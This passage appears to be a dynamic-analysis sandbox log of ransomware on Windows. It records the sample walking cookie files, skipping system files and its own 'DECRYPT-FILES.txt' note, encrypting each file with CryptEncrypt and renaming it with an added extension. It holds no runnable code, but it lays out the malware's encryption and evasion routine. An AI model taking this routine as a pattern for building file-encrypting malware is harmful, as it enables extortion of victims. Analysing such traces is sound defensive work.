lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0079.113] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0079.113] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0079.113] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0079.113] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0079.113] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0079.113] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0079.114] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0079.114] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0079.114] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0079.114] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0079.114] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0079.114] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0079.114] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0079.114] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0079.114] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0079.114] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0079.114] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0079.114] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adform[1].txt") returned 110 [0079.114] wsprintfW (in: param_1=0x3f2d4b4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adform[1].txt.qawmOn") returned 117 [0079.114] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adform[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adform[1].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adform[1].txt.qawmOn" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adform[1].txt.qawmon"), dwFlags=0x0) returned 1 [0079.115] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.115] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.115] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.115] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbe5d5130, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0x45f08810, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x45f08810, ftLastWriteTime.dwHighDateTime=0x1d2faf3, nFileSizeHigh=0x0, nFileSizeLow=0x242, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@adnxs[1].txt", cAlternateFileName="5P89EF~1.TXT")) returned 1 [0079.115] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adnxs[1].txt", lpString2="DECRYPT-FILES.txt") returned -1 [0079.115] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adnxs[1].txt", lpString2="autorun.inf") returned -1 [0079.115] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adnxs[1].txt", lpString2="boot.ini") returned -1 [0079.115] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adnxs[1].txt", lpString2="desktop.ini") returned -1 [0079.116] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adnxs[1].txt", lpString2="ntuser.dat") returned -1 [0079.116] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adnxs[1].txt", lpString2="iconcache.db") returned -1 [0079.116] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adnxs[1].txt", lpString2="bootsect.bak") returned -1 [0079.116] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adnxs[1].txt", lpString2="ntuser.dat.log") returned -1 [0079.116] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adnxs[1].txt", lpString2="thumbs.db") returned -1 [0079.116] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adnxs[1].txt", lpString2="Bootfont.bin") returned -1 [0079.116] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@adnxs[1].txt") returned 33 [0079.116] lstrcmpiW (lpString1="txt", lpString2="lnk") returned 1 [0079.116] lstrcmpiW (lpString1="txt", lpString2="exe") returned 1 [0079.116] lstrcmpiW (lpString1="txt", lpString2="sys") returned 1 [0079.116] lstrcmpiW (lpString1="txt", lpString2="dll") returned 1 [0079.116] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned 76 [0079.116] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@adnxs[1].txt") returned 33 [0079.116] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" [0079.116] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\", lpString2="5p5nrgjn0js_halpmcxz@adnxs[1].txt" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adnxs[1].txt") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adnxs[1].txt" [0079.116] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0079.116] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adnxs[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adnxs[1].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x460 [0079.123] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x3f2d480 | out: lpFileSize=0x3f2d480*=578) returned 1 [0079.123] CreateFileMappingW (hFile=0x460, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x464 [0079.123] MapViewOfFile (hFileMappingObject=0x464, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0079.124] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0079.124] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0079.124] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0079.125] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x100) returned 1 [0079.125] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0079.125] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.125] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0079.126] CloseHandle (hObject=0x464) returned 1 [0079.126] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.126] WriteFile (in: hFile=0x460, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d408, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d408*=0x108, lpOverlapped=0x0) returned 1 [0079.127] CloseHandle (hObject=0x0) returned 0 [0079.128] CloseHandle (hObject=0x460) returned 1 [0079.128] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.128] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.129] GetTickCount () returned 0x114c468 [0079.129] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0079.129] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0079.129] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0079.129] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0079.130] lstrlenA (lpString="kernel32.dll") returned 12 [0079.130] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0079.130] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0079.130] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0079.130] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0079.130] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0079.130] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0079.130] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0079.130] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0079.130] lstrlenA (lpString="ADDATOMA") returned 8 [0079.130] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0079.130] lstrlenA (lpString="ADDATOMW") returned 8 [0079.130] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0079.130] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0079.130] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0079.130] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0079.130] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0079.130] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0079.130] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0079.130] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0079.130] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0079.130] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0079.130] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0079.130] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0079.130] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0079.130] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0079.130] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0079.130] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0079.130] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0079.130] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0079.130] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0079.131] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0079.131] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0079.131] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0079.131] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0079.131] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0079.131] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0079.131] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0079.131] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0079.131] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0079.131] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0079.131] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0079.131] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0079.131] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0079.131] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0079.131] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0079.131] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0079.131] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0079.131] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0079.131] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0079.131] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0079.131] lstrlenA (lpString="BACKUPREAD") returned 10 [0079.131] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0079.131] lstrlenA (lpString="BACKUPSEEK") returned 10 [0079.131] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0079.131] lstrlenA (lpString="BACKUPWRITE") returned 11 [0079.131] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0079.131] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0079.131] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0079.131] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0079.131] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0079.131] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0079.131] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0079.131] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0079.131] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0079.131] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0079.131] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0079.131] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0079.132] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0079.132] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0079.132] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0079.132] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0079.132] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0079.132] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0079.132] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0079.132] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0079.132] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0079.132] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0079.132] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0079.132] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0079.132] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0079.132] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0079.132] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0079.132] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0079.132] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0079.132] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0079.132] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0079.132] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0079.132] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0079.132] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0079.132] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0079.132] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0079.132] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0079.132] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0079.132] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0079.132] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0079.132] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0079.132] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0079.132] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0079.132] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0079.132] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0079.132] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0079.132] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0079.132] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0079.132] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0079.133] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0079.133] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0079.133] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0079.133] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0079.133] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0079.133] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0079.133] lstrlenA (lpString="BEEP") returned 4 [0079.133] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0079.133] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0079.133] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0079.133] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0079.133] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0079.133] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0079.133] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0079.133] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0079.133] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0079.133] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0079.133] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0079.133] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0079.133] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0079.133] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0079.133] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0079.133] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0079.133] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0079.133] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0079.133] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0079.133] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0079.133] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0079.133] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0079.133] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0079.133] lstrlenA (lpString="CANCELIO") returned 8 [0079.133] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0079.133] lstrlenA (lpString="CANCELIOEX") returned 10 [0079.133] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0079.133] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0079.133] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0079.134] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0079.134] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0079.134] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0079.134] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0079.134] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0079.134] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0079.134] lstrlenA 